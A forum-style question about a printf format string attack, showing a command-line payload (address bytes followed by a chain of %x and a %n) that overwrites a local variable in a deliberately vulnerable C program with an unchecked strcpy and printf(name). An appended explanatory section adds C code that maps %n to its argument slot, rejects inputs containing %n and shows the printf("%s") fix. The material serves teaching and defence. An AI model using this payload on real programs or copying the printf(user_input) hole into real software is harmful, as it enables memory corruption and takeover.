
Format string attack with printf

Çağlar Arlı

We can do a format string attack in the following way:

$ ./program.out $(echo -en '\xa8\xd1\xff\xff')%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n

Address of name: ffffd1ac, secret: ffffd1a8

ffffd849.ffffd1a8.565561b7.3.0.0.ffffd684.f7d6e70c.f7feec36.12345678.

secret: 70

The program then passes the input to the printf function:

#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Stand-in for the callee the question omits; prints the value it receives, as in the "secret: 70" line above (output format assumed) */
static void some_function(int secret) {
    printf("\nsecret: %d\n", secret);
}

int main(int argc, char *argv[]) {
    char name[1024];
    int secret = 0x12345678;
    /* both addresses are printed, matching the output shown above */
    printf("Address of name: %8x, secret: %8x\n",
           (unsigned)(uintptr_t)&name, (unsigned)(uintptr_t)&secret);
    if (argc < 2) return 1;
    strcpy(name, argv[1]);   /* unchecked copy into a fixed buffer, as posted */
    printf(name);            /* the vulnerable call: user input used as the format string */
    some_function(secret);
    return 0;
}

However, I am confused about how we managed to make sure that the number of characters (70) is written to the address of secret. I see that in the argument to program.out we have "$(echo -en '\xa8\xd1\xff\xff')" (which is the address of secret), but how exactly does this work? How exactly is %n mapped to that given address?

Thank you in advance.
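The following is an added example, not part of the question or of the program it shows. It illustrates the mechanism behind the mapping the question asks about and the fix for it: every conversion other than `%%` consumes one variadic argument slot in order, so in a string of ten `%x` followed by `%n` the `%n` reads the eleventh slot; in the output above the tenth `%x` already prints `secret`'s own value (`12345678`), and the next slot is the first four bytes of `name`, i.e. whatever was placed at the start of the input. The code parses a format string to report which slot `%n` binds to (an audit/detection check), shows `%n`'s legitimate semantics with a trusted literal format, and shows the hardened call `printf("%s", name)` under which user input consumes no slots at all. The attack string with `AAAA` in place of the address bytes is a constructed sample; handling of positional `%k$` directives is deliberately left out (an assumption of this helper, not a property of printf).

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Walk a printf-style string and count the conversions it contains.
 * Each conversion other than "%%" consumes one variadic argument slot,
 * so the k-th conversion reads the k-th slot. Returns the 1-based slot
 * that the first %n would consume, or 0 if the string has no %n; the
 * total number of conversions is written to *total when non-NULL.
 * Positional "%k$" directives are not handled here (assumption). */
int n_directive_slot(const char *s, int *total)
{
    int slot = 0, n_slot = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')           /* "%%" is a literal percent sign */
            continue;
        if (*p == '\0')
            break;
        /* skip flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.hlLqjzt", *p))
            p++;
        if (*p == '\0')
            break;
        slot++;                  /* reached a conversion letter: one argument slot */
        if (*p == 'n' && n_slot == 0)
            n_slot = slot;
    }
    if (total)
        *total = slot;
    return n_slot;
}

/* Convenience wrapper: total number of argument-consuming conversions. */
int total_conversions(const char *s)
{
    int total = 0;
    n_directive_slot(s, &total);
    return total;
}

/* Legitimate %n use with a trusted, literal format: the library stores
 * the number of characters emitted so far into the int that the %n
 * argument points to. Returns that count, which equals strlen(prefix). */
int chars_before_n(const char *prefix)
{
    char out[256];
    int count = -1;
    snprintf(out, sizeof out, "%s%n", prefix, &count);
    return count;
}

/* Hardened echo: user input is passed as data to a literal "%s" format,
 * so any directives it contains are copied verbatim and consume no
 * argument slots. Returns the length snprintf reports. */
int safe_echo(char *dst, size_t dstlen, const char *user_input)
{
    return snprintf(dst, dstlen, "%s", user_input);
}

/* Defence-in-depth check for an input that is about to be logged or
 * echoed: anything carrying %n is rejected outright.
 * Returns 1 if the string is acceptable, 0 otherwise. */
int format_is_acceptable(const char *s)
{
    return n_directive_slot(s, NULL) == 0;
}

int main(void)
{
    /* constructed sample: the directive part of the attack string in the
     * question, with the four address bytes replaced by "AAAA" */
    const char *sample = "AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n";
    int total = 0;
    int slot = n_directive_slot(sample, &total);
    char buf[128];

    printf("conversions: %d, %%n consumes argument slot %d\n", total, slot);
    printf("%%n placed after \"AAAA\" stores %d\n", chars_before_n("AAAA"));
    printf("acceptable for logging: %d\n", format_is_acceptable(sample));
    safe_echo(buf, sizeof buf, sample);
    printf("hardened echo prints the input unchanged: %s\n", buf);
    return 0;
}
```

Compiling the original program with `-Wformat -Wformat-security` flags the `printf(name)` call, which is the check to run over a code base before any of the above is needed; the runtime checks here are for paths where a non-literal format cannot be avoided.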